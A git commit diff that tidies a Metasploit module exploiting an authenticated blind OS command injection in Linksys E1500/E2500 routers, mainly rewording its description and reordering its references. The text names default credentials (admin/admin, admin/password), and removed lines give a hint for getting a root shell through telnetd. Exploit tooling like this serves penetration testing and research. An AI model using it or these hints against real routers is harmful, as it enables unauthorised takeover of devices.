cleanup for linksys_e1500_e2500_exec

2013-03-23 23:30:49 +01:00 · 2013-03-23 23:30:49 +01:00 · 49ac3ac1a3
parent 98be5d97b8
commit 49ac3ac1a3
1 changed files with 35 additions and 42 deletions
--- a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
+++ b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
@ -13,28 +13,23 @@ class Metasploit3 < Msf::Auxiliary

 	def initialize(info = {})
 		super(update_info(info,
-			'Name'            => 'Linksys E1500/E2500 Remote OS Command Execution',
+			'Name'            => 'Linksys E1500/E2500 Remote Command Execution',
 			'Description'     => %q{
-					Some Linksys Routers are vulnerable to OS Command injection.
-				You will need credentials to the webinterface to access the vulnerable part
-				of the application. Default credentials are always a good starting point.
-				admin/admin or admin/password could be a first try.
-				Note: This is a blind os command injection vulnerability. This means that you will
-				not see any output of your command. Try a ping command to your local system for a
-				first test.
-
-				Hint: To get a remote shell you could start telnetd and touch /etc/group. Use the 
-				user root without a password for accessing the device.
+					Some Linksys Routers are vulnerable to an authenticated OS command injection.
+				Default credentials for the web interface are admin/admin or admin/password. Since
+				it is a blind os command injection vulnerability, there is no output for the
+				executed command. A ping command against a controlled system for can be used for
+				testing purposes.
 			},
 			'Author'          => [ 'm-1-k-3' ],
 			'License'         => MSF_LICENSE,
 			'References'      =>
 				[
-					[ 'URL', 'http://homesupport.cisco.com/de-eu/support/routers/E1500' ],
-					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ],
-					[ 'EDB', '24475' ],
 					[ 'OSVDB', '89912' ],
-					[ 'BID', '57760' ]
+					[ 'BID', '57760' ],
+					[ 'EDB', '24475' ],
+					[ 'URL', 'http://homesupport.cisco.com/de-eu/support/routers/E1500' ],
+					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ]
 				],
 			'DisclosureDate' => 'Feb 05 2013'))

@ -75,7 +70,6 @@ class Metasploit3 < Msf::Auxiliary
 			return
 		end

-
 		print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])

 		cmd = datastore['CMD']
@ -85,8 +79,7 @@ class Metasploit3 < Msf::Auxiliary

 		vprint_status("#{rhost}:#{rport} - using the following target URL: #{uri}")
 		begin
-			res = send_request_cgi(
-				{
+			res = send_request_cgi({
 				'uri'    => uri,
 				'method' => 'POST',
 				'authorization' => basic_auth(user,pass),